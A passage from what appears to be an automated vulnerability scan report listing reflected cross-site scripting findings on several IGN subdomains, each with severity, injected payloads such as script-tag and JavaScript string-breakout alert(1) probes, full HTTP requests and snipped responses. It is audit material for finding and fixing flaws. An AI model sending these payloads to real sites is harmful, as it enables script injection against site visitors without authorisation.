The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f1cc"><script>alert(1)</script>809dd1f2a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/reviews.html?5f1cc"><script>alert(1)</script>809dd1f2a6=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.310. http://movies.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fd5"><script>alert(1)</script>366b0d09f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/videos.html?e9fd5"><script>alert(1)</script>366b0d09f7=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.311. http://movies.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2c05"-alert(1)-"06ba3a2f0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/videos.html?a2c05"-alert(1)-"06ba3a2f0ce=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies: Traile ...[SNIP]... eof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/index/videos.html?a2c05"-alert(1)-"06ba3a2f0ce=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.312. http://movies.ign.com/trailers.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/trailers.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb10f"><script>alert(1)</script>e4875c2c936 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trailers.html?bb10f"><script>alert(1)</script>e4875c2c936=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies Movie T ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://movies.ign.com/trailers.html?bb10f"><script>alert(1)</script>e4875c2c936=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.313. http://movies.ign.com/trailers.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/trailers.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d377"-alert(1)-"34ba2ac3b55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trailers.html?2d377"-alert(1)-"34ba2ac3b55=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies Movie T ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/trailers.html?2d377"-alert(1)-"34ba2ac3b55=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.314. http://music.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://music.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67efe"-alert(1)-"ed7b4f278a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?67efe"-alert(1)-"ed7b4f278a7=1 HTTP/1.1 Host: music.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Music: Intervi ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://music.ign.com/?67efe"-alert(1)-"ed7b4f278a7=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.315. http://music.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://music.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59dac"><script>alert(1)</script>a9f1a2cb63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?59dac"><script>alert(1)</script>a9f1a2cb63=1 HTTP/1.1 Host: music.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.316. http://pc.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb9f7"><script>alert(1)</script>8008868e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bb9f7"><script>alert(1)</script>8008868e4=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>PC Games - Cheats, ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/?bb9f7"><script>alert(1)</script>8008868e4=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.317. http://pc.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10223"-alert(1)-"ec047a3d9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?10223"-alert(1)-"ec047a3d9d=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>PC Games - Cheats, ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/?10223"-alert(1)-"ec047a3d9d=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.318. http://pc.ign.com/articles/111/1119875p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/111/1119875p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57a8e"><script>alert(1)</script>f40365d6661 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/111/1119875p1.html?57a8e"><script>alert(1)</script>f40365d6661=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.319. http://pc.ign.com/articles/111/1119875p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/111/1119875p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15edb"-alert(1)-"a01a408cb21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/111/1119875p1.html?15edb"-alert(1)-"a01a408cb21=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/articles/111/1119875p1.html?15edb"-alert(1)-"a01a408cb21=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.320. http://pc.ign.com/articles/113/1137541p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/113/1137541p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b63"><script>alert(1)</script>3a3fce5b61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/113/1137541p1.html?80b63"><script>alert(1)</script>3a3fce5b61=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.321. http://pc.ign.com/articles/113/1137541p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/113/1137541p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75f08"-alert(1)-"46e4d2add78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/113/1137541p1.html?75f08"-alert(1)-"46e4d2add78=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/articles/113/1137541p1.html?75f08"-alert(1)-"46e4d2add78=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.322. http://pc.ign.com/articles/114/1145020p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1145020p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7d1"><script>alert(1)</script>51144aa236a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1145020p1.html?ce7d1"><script>alert(1)</script>51144aa236a=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.323. http://pc.ign.com/articles/114/1145020p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1145020p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ebe0"-alert(1)-"eb0204226ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1145020p1.html?9ebe0"-alert(1)-"eb0204226ac=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/articles/114/1145020p1.html?9ebe0"-alert(1)-"eb0204226ac=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.324. http://pc.ign.com/articles/114/1145332p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1145332p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f77e2"-alert(1)-"b571726404e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1145332p1.html?f77e2"-alert(1)-"b571726404e=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/articles/114/1145332p1.html?f77e2"-alert(1)-"b571726404e=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.325. http://pc.ign.com/articles/114/1145332p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1145332p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fe2e"><script>alert(1)</script>99d7449434e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1145332p1.html?6fe2e"><script>alert(1)</script>99d7449434e=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.326. http://pc.ign.com/articles/114/1146760p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1146760p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d5f"-alert(1)-"30de2b8b4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1146760p1.html?f8d5f"-alert(1)-"30de2b8b4e2=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/articles/114/1146760p1.html?f8d5f"-alert(1)-"30de2b8b4e2=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.327. http://pc.ign.com/articles/114/1146760p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1146760p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61490"><script>alert(1)</script>180a7a18a5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1146760p1.html?61490"><script>alert(1)</script>180a7a18a5d=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.328. http://pc.ign.com/articles/114/1147797p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1147797p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a643b"-alert(1)-"d54227ec17c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147797p1.html?a643b"-alert(1)-"d54227ec17c=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/articles/114/1147797p1.html?a643b"-alert(1)-"d54227ec17c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.329. http://pc.ign.com/articles/114/1147797p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1147797p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15827"><script>alert(1)</script>bb411baefd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147797p1.html?15827"><script>alert(1)</script>bb411baefd=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.330. http://pc.ign.com/articles/114/1147953p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1147953p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c58c7"-alert(1)-"732382c3209 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147953p1.html?c58c7"-alert(1)-"732382c3209=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/articles/114/1147953p1.html?c58c7"-alert(1)-"732382c3209=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.331. http://pc.ign.com/articles/114/1147953p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1147953p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c63f"><script>alert(1)</script>f87914668b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147953p1.html?7c63f"><script>alert(1)</script>f87914668b3=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.332. http://pc.ign.com/articles/114/1147988p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1147988p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f327"><script>alert(1)</script>262c2351f1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147988p1.html?6f327"><script>alert(1)</script>262c2351f1b=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.333. http://pc.ign.com/articles/114/1147988p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/articles/114/1147988p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f648"-alert(1)-"f6d246335de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147988p1.html?3f648"-alert(1)-"f6d246335de=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/articles/114/1147988p1.html?3f648"-alert(1)-"f6d246335de=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.334. http://pc.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8354"><script>alert(1)</script>69bfb467085 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/features.html?d8354"><script>alert(1)</script>69bfb467085=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>PC Game Reviews, P ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/features.html?d8354"><script>alert(1)</script>69bfb467085=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.335. http://pc.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d013"-alert(1)-"443171ee2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/features.html?1d013"-alert(1)-"443171ee2b9=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
